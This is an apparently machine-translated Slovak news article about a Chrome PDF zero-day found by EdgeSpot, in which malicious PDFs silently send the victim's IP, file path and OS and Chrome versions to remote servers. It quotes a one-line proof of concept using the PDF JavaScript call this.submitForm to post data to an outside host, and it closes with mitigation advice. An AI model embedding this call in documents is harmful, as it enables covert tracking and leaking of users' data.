Služba detekcie zneužitia EdgeSpot objavil zaujímavú zraniteľnosť prehliadača Chrome v nultom dni, ktorá využíva dokumenty PDF. Táto chyba zabezpečenia umožňuje útočníkom zhromažďovať citlivé údaje pomocou škodlivých dokumentov PDF otvorených v prehliadači Chrome.

Hneď ako obeť otvorí príslušné súbory PDF v prehliadači Google Chrome, na pozadí zhromažďovania údajov o používateľoch začne fungovať škodlivý program.

Dáta sa potom posielajú na vzdialený server, ktorý kontrolujú hackeri. Možno by vás zaujímalo, aké údaje útočník nasáva. Zacielujú na tieto údaje na vašom počítači:

• IP adresa
• Úplná cesta k súboru PDF v systéme
• Verzie OS a Chrome

Dajte si pozor na malware súbory PDF

Možno vás prekvapí, že keď sa na otváranie súborov PDF používa Adobe Reader, nič sa nestane. Požiadavky HTTP POST sa navyše používajú na prenos údajov na vzdialené servery bez zásahu používateľa.

Odborníci zistili, že údaje dostali jedna z dvoch domén readnotifycom alebo burpcollaboratornet.

Intenzitu útoku si viete predstaviť tým, že väčšina antivírusového softvéru nedokáže zistiť vzorky zistené pomocou EdgeSpot.

Experti odhaľujú, že útočníci používajú API Javascript PDF „this.submitForm ()“ na zhromažďovanie citlivých informácií používateľov.

Testovali sme to s minimálnym PoC, jednoduchým volaním pomocou rozhrania API, ako je „this.submitForm ('http://google.com/test')“, bude prehliadač Google Chrome odosielať osobné údaje na adresu google.com.

Odborníci v skutočnosti zistili, že túto chybu prehliadača Chrome využívajú dve odlišné súbory škodlivých súborov PDF. Obidve boli rozposlané v októbri 2017 a septembri 2018.

Zhromaždené údaje môžu útočníci využiť najmä na doladenie útokov v budúcnosti. Správy naznačujú, že prvá dávka súborov bola zostavená pomocou služby ReadNotify na sledovanie PDF.

Používatelia môžu službu využívať na sledovanie používateľských názorov. EdgeSpot nezdieľa žiadne podrobnosti týkajúce sa povahy druhej sady súborov PDF.

Ako zostať chránení

Služba detekcie zneužitia EdgeSpot chcel upozorniť používateľov prehliadača Chrome na potenciálne riziká, pretože oprava sa neočakáva, že bude vydaná v blízkej budúcnosti.

Spoločnosť EdgeSpot informovala spoločnosť Google o zraniteľnosti v minulom roku a spoločnosť prisľúbila vydanie záplaty koncom apríla. H

v každom prípade môžete zvážiť použitie dočasného riešenia problému lokálnym prezeraním prijatých dokumentov PDF pomocou alternatívnej aplikácie na čítanie PDF.

Dokumenty PDF môžete otvoriť aj v prehliadači Chrome odpojením systémov od Internetu. Medzitým môžete počkať na aktualizáciu prehliadača Chrome 74, ktorá bude zverejnená 23. apríla.